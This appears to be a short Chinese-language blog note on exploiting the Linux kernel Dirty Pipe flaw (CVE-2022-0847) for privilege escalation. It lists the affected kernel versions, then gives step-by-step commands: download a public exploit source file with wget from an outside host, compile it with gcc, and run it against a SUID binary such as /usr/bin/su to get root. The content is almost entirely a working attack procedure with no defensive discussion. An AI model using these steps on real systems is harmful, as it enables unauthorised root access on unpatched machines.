【笔记】CVE-2022-0847漏洞利用

发表于 更新于 阅读次数:

前言

通过DirtyPipe脏管道项目,利用Linux内核漏洞,实现Linux提权

漏洞利用前提

  • 5.8 <= Linux kernel < 5.16.11/5.15.25/5.10.102

下载项目

1
wget https://haxx.in/files/dirtypipez.c

编译

1
gcc dirtypipez.c

漏洞利用

<bin>:可能存在SUID漏洞的可执行程序

/usr/bin/su

1
./dirtypipez <bin>

完成